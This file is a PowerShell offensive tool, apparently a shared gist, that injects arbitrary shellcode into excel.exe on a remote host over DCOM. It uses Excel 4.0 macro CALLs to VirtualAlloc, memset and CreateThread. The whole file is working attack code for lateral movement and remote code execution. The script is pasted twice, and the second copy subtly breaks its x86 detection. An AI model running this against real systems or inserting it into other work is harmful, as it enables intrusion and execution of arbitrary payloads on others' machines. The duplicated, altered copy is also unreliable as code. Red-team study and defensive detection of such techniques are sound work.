joeleonjr/Invoke-Excel4DCOM64.ps1

## Invoke-Excel4DCOM64.ps1
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank,
#	  x64 support by  Philip Tsukerman (@PhilipTsukerman) / Cybereason,
#	  Excel version detection by Joe Leon (@JoeLeonJr) / FortyNorth Security
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************

function Invoke-Excel4DCOM
{
<#
.SYNOPSIS
Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
.DESCRIPTION
Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection.
Use a Powershell version with the same bitness as the Office version when running locally.
This script automatically parses the Excel version (x86 vs x64) and sends the appropriate shellcode.
.PARAMETER Computername
Specify a remote host to inject into.
.PARAMETER Payload86
Specify a file containing the x86 shellcode.
.PARAMETER Payload64
Specify a file containing the x64 shellcode.
.EXAMPLE
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
Inject payload into excel.exe on server01.

.LINK
http://www.outflank.nl
.NOTES
Outflank - stan@outflank.nl
#>
	[CmdletBinding()] Param(
		[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
		[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
		[String]
		$ComputerName,

		[Parameter(Position = 1, Mandatory = $true)]
		[Alias("Shellcode86","x86", "86")]
		[String]
		$Payload86,

		[Parameter(Position = 2, Mandatory = $true)]
		[Alias("Shellcode64", "x64", "64")]
		[String]
		$Payload64

	)

	# Create an instance of the Excel.Application COM object
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
	if ($excel.path -like "*x86*") {
	    $lpAddress = 0
	    $sc = get-content -Encoding Byte $Payload86
	}
	else {
	    # If we are using 64bit Excel, try to allocate a low address
	    $lpAddress = 1342177280
	    $sc = get-content -Encoding Byte $Payload64
	}


	# Address allocation
	$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')

	$count = 0
	# Write the payload byte by byte to oure allocated buffer
	foreach ($byte in $sc) {
		$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
		$count = $count + 1

		Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
	}

	# Shellcode Time!
	$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
}
	#**********************************************************************
	# Invoke-Excel4DCOM64.ps1
	# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
	# Author: Stan Hegt (@StanHacked) / Outflank,
	# x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason,
	# Excel version detection by Joe Leon (@JoeLeonJr) / FortyNorth Security
	# Date: 2019/04/21
	# Version: 1.1
	#**********************************************************************

	function Invoke-Excel4DCOM
	{
	<#
	.SYNOPSIS
	Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
	.DESCRIPTION
	Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection.
	Use a Powershell version with the same bitness as the Office version when running locally.
	This script automatically parses the Excel version (x86 vs x64) and sends the appropriate shellcode.
	.PARAMETER Computername
	Specify a remote host to inject into.
	.PARAMETER Payload86
	Specify a file containing the x86 shellcode.
	.PARAMETER Payload64
	Specify a file containing the x64 shellcode.
	.EXAMPLE
	PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
	Inject payload into excel.exe on server01.

	.LINK
	http://www.outflank.nl
	.NOTES
	Outflank - stan@outflank.nl
	#>
	[CmdletBinding()] Param(
	[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
	[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
	[String]
	$ComputerName,

	[Parameter(Position = 1, Mandatory = $true)]
	[Alias("Shellcode86","x86", "86")]
	[String]
	$Payload86,

	[Parameter(Position = 2, Mandatory = $true)]
	[Alias("Shellcode64", "x64", "64")]
	[String]
	$Payload64

	)

	# Create an instance of the Excel.Application COM object
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
	if ($excel.path -like "x86") {
	$lpAddress = 0
	$sc = get-content -Encoding Byte $Payload86
	}
	else {
	# If we are using 64bit Excel, try to allocate a low address
	$lpAddress = 1342177280
	$sc = get-content -Encoding Byte $Payload64
	}


	# Address allocation
	$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')

	$count = 0
	# Write the payload byte by byte to oure allocated buffer
	foreach ($byte in $sc) {
	$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
	$count = $count + 1

	Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
	}

	# Shellcode Time!
	$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
	}